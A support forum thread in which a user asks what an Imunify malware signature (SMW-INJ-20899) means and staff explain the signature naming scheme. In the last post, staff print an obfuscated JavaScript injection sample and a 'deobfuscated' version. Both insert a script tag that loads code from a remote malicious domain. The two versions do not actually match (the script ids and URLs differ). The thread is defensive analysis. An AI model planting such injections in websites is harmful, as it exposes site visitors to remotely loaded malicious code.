Announcement

Collapse
No announcement yet.

Lookup definition vor malware signature

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Time
  • Show
Clear All
new posts
Previous template Next
  • #1

    Lookup definition vor malware signature

    Hey Imunify-Community!

    Is there a simple way to lookup what the infection for a specific scan result does mean in detail?

    Example:
    SMW-INJ-20899-js.spam.redi-2

    Okay, that means "Server Side Maleware, Javascript, Spam, Redirect" ... but how looks the infection for "20899" in detail? By inspecting the files I cannot find any malicous code :-/

    Thanks for your reply!

    Tags: None
  • #2
    Hello Steffen,

    Thank you for asking! If it is an injection, then it is possible to compare two files before and after clean-up, although there is no simple way to query this information from scan results. The naming convention is described in our documentation. Here is a short passage from it:

    You can derive some information from the signature ID itself. SMW-SA-05155-wshll – in this Signature ID:
    • The first section can be either SMW or CMW. SMW stands for Server Malware and CMW stands for Client Malware
    • The second section of ID can be either INJ or SA. INJ stands for Injection (means Malware is Injected into some legitimate file) and SA stands for StandAlone (means File is Completely Malicious)
    • The third section is 05155. This is simply an identification number for the signature.
    • The fourth section wshll/mlw.wp/etc explains the category and class of malware identified. Here, wshll stands for web shell (mlw stands for malware).
    • The fifth section is 0, which provides the version number of the signature.


    I don't have a response on what exactly the signature number 20899 does clean, such a scenario implies submitting a false-positive:
    https://cloudlinux.zendesk.com/hc/en-us/articles/360011906013-How-to-submit-a-false-positive-negative-result-for-malware-scanner-

    Having said this, injections are sometimes easy to miss, please provide the sample. Maybe I can get a bit more information regarding the injection from our malware analysts.

    Thank you for drawing our attention to this matter, likely we will create an additional KCS article to describe these nuances.

    Comment

    • #3
      Thank you for your quick reply. On the specific server, wie use Imunify+, so there is no CLI to submit a false positive file for check. I could provide you a sample file - but not here in the forum. I can also provide you a malicious WordPress plug-in, by that the server had been infected a day before. I cleaned up everything as far as possible. Other tools did not find any more infection - but Imunify+ reports at any scan. I also cannot provide an exclusion, as the infection is detected within cached files.

      Is there an E-Mail Adress we can correspond on?

      Kind regards,
      Steffen

      Comment

      • #4
        Me again Steffen,

        I wanted to update you regarding the signature 20899. Our malware analysts based on their samples provided the following example:
        Code:
        var scripts = document.getElementsByTagName("script"); var wantmee = false;for (var i = 0; i < scripts.length; i++) { if (scripts[i].id) { if (scripts[i].id == "trackthisposition"){ wantmee=true; } } }if(wantmee==false){ var d=document;var s=d.createElement('script'); s.id="trackthisposition";s.async=true;s.src=String.fromCharCode(104,116,116,112,115,58,47,47,115,105,109,112,108,101,46,99,111,102,111,117,110,100,101,114,115,112,101,99,105,97,108,115,46,99,111,109,47,115,116,114,111,110,103,46,106,115,63,118,61,51,46,48,48); if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName('head')[0].appendChild(s);} }
        If you look at String.fromCharCode, after deobfuscation it effectively results in the:
        Code:
        var scripts=document.getElementsByTagName("script");var wantme=false;for(var i=0;i<scripts.length;i++){if(scripts[i].id){if(scripts[i].id=="trackmyposs"){wantme=true;}}}if(wantme==false){var d=document;var s=d.createElement('script');s.id="trackmyposs";s.src='[URL="https://collect.greengoplatform.com/flag.js?v=7.1.3%27;if(document.currentScript)%7Bdocument.currentScript.parentNode.insertBefore(s,document.currentScript);%7Delse%7Bd.getElementsByTagName(%27head%27)%5B0%5D.appendChild(s);%7D"]https://collect.greengoplatform.com/flag.js?v=7.1.3';if(document.currentScript){document.currentScript.parentNode.insertBefore(s,document.currentScript);}else{d.getElementsByTagName('head')[0].appendChild(s);}[/URL]}​
        The encoded URL is known to be malicious. Such techniques are often used with malware injects.

        Should you have more questions, please do not hesitate to ask.
        Last edited by mchernyavsky; 12-08-2022, 02:05 PM.

        Comment

        Previous template Next
        Working...
        X